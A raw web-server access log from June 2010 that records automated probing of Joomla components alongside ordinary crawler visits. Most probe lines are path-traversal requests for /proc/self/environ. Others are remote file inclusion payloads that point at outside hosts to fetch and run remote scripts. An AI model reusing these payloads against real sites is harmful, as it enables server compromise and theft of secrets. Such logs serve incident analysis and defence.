114.108.128.56 - - [21/Jun/2010:04:44:14 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
75.127.98.12 - - [21/Jun/2010:04:44:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:44:38 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [21/Jun/2010:04:45:19 -0500] "GET /logs/access_log.1195344000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.128.56 - - [21/Jun/2010:04:45:59 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:00 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:00 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:31 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:31 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:32 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:46:33 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:48:57 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:49:09 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:50:00 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:50:00 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:50:26 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:50:28 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:51:27 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.205.85.5 - - [21/Jun/2010:04:53:44 -0500] "GET /logs/access_log.1274313600/?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.205.85.5 - - [21/Jun/2010:04:53:44 -0500] "GET /?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.205.85.5 - - [21/Jun/2010:04:53:44 -0500] "GET /logs/?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.834"
67.59.156.163 - - [21/Jun/2010:04:53:58 -0500] "GET /logs/access_log.1274572800/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
67.59.156.163 - - [21/Jun/2010:04:55:21 -0500] "GET /logs/access_log.1274572800/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
114.108.128.56 - - [21/Jun/2010:04:55:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:55:48 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:55:49 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:56:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:56:33 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:56:33 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
119.63.198.3 - - [21/Jun/2010:04:56:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
114.108.128.56 - - [21/Jun/2010:04:56:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:56:57 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.128.56 - - [21/Jun/2010:04:56:58 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
75.127.98.12 - - [21/Jun/2010:04:57:24 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:57:24 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:57:24 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
208.92.165.130 - - [21/Jun/2010:04:57:59 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:57:59 -0500] "GET /logs/access_log.1274572800%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:57:59 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
114.108.128.56 - - [21/Jun/2010:04:58:02 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
208.92.165.130 - - [21/Jun/2010:04:58:44 -0500] "GET /*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:58:44 -0500] "GET /logs/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:04:58:44 -0500] "GET /logs/access_log.1274572800%20%20/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
75.127.98.12 - - [21/Jun/2010:04:58:47 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:58:47 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:58:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
114.108.128.56 - - [21/Jun/2010:04:58:52 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.205.85.5 - - [21/Jun/2010:04:59:05 -0500] "GET /logs/access_log.1274313600/?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.205.85.5 - - [21/Jun/2010:04:59:05 -0500] "GET /?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.205.85.5 - - [21/Jun/2010:04:59:05 -0500] "GET /logs/?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.834"
114.108.128.56 - - [21/Jun/2010:04:59:22 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
75.127.98.12 - - [21/Jun/2010:04:59:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:59:54 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:59:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:04:59:55 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
208.92.165.130 - - [21/Jun/2010:05:00:02 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:00:11 -0500] "GET /logs/access_log.1274832000/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:00:32 -0500] "GET /logs/access_log.1274572800/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:00:42 -0500] "GET /logs/access_log.1274832000/*.?option=com_gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.212.56 - - [21/Jun/2010:05:01:49 -0500] "GET /logs/access_log.1274313600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:05:01:49 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:05:01:50 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:05:02:08 -0500] "GET /logs/access_log.1274313600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:05:02:09 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:05:02:10 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
75.127.98.12 - - [21/Jun/2010:05:03:58 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:03:58 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:03:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.199.201 - - [21/Jun/2010:05:04:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.108.94.61 - - [21/Jun/2010:05:05:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
78.108.94.61 - - [21/Jun/2010:05:05:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
78.108.94.61 - - [21/Jun/2010:05:05:43 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:06:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
207.46.12.67 - - [21/Jun/2010:05:06:23 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1)"
75.127.98.12 - - [21/Jun/2010:05:06:41 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:06:47 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:06:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.92.165.130 - - [21/Jun/2010:05:07:43 -0500] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:07:43 -0500] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:07:44 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.127.98.12 - - [21/Jun/2010:05:07:50 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
208.92.165.130 - - [21/Jun/2010:05:09:12 -0500] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:09:12 -0500] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:09:12 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:09:15 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:09:27 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:10:10 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:10:21 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&vieww=gcalendar&controller=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:14:12 -0500] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
75.127.98.12 - - [21/Jun/2010:05:22:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:22:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:22:37 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:23:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:23:50 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:23:50 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.204.182 - - [21/Jun/2010:05:24:40 -0500] "GET /logs/access_log.1220400000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.24.79.167 - - [21/Jun/2010:05:26:07 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.24.79.167 - - [21/Jun/2010:05:26:13 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
87.106.28.150 - - [21/Jun/2010:05:27:41 -0500] "GET /logs/access_log.1274572800%20%20//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:05:27:41 -0500] "GET /logs//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:05:27:41 -0500] "GET //main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.195.112.180 - - [21/Jun/2010:05:28:46 -0500] "GET /logs/access_log.1161907200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.127.98.12 - - [21/Jun/2010:05:28:55 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:28:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:28:55 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:29:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:29:25 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:29:25 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.195.112.180 - - [21/Jun/2010:05:30:47 -0500] "GET /logs/access_log.1252800000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [21/Jun/2010:05:32:38 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.85.170 - - [21/Jun/2010:05:33:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:33:50 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:33:51 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:34:00 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
75.127.98.12 - - [21/Jun/2010:05:34:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
218.150.85.170 - - [21/Jun/2010:05:34:19 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:34:20 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:34:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:34:27 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:34:28 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
75.127.98.12 - - [21/Jun/2010:05:34:33 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:34:45 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.127.98.12 - - [21/Jun/2010:05:35:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
218.150.85.170 - - [21/Jun/2010:05:37:29 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:37:30 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.825"
218.150.85.170 - - [21/Jun/2010:05:37:30 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.825"
94.136.63.119 - - [21/Jun/2010:05:38:02 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
94.136.63.119 - - [21/Jun/2010:05:38:02 -0500] "GET /logs/access_log.1274832000//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
94.136.63.119 - - [21/Jun/2010:05:38:02 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
85.235.154.15 - - [21/Jun/2010:05:38:06 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
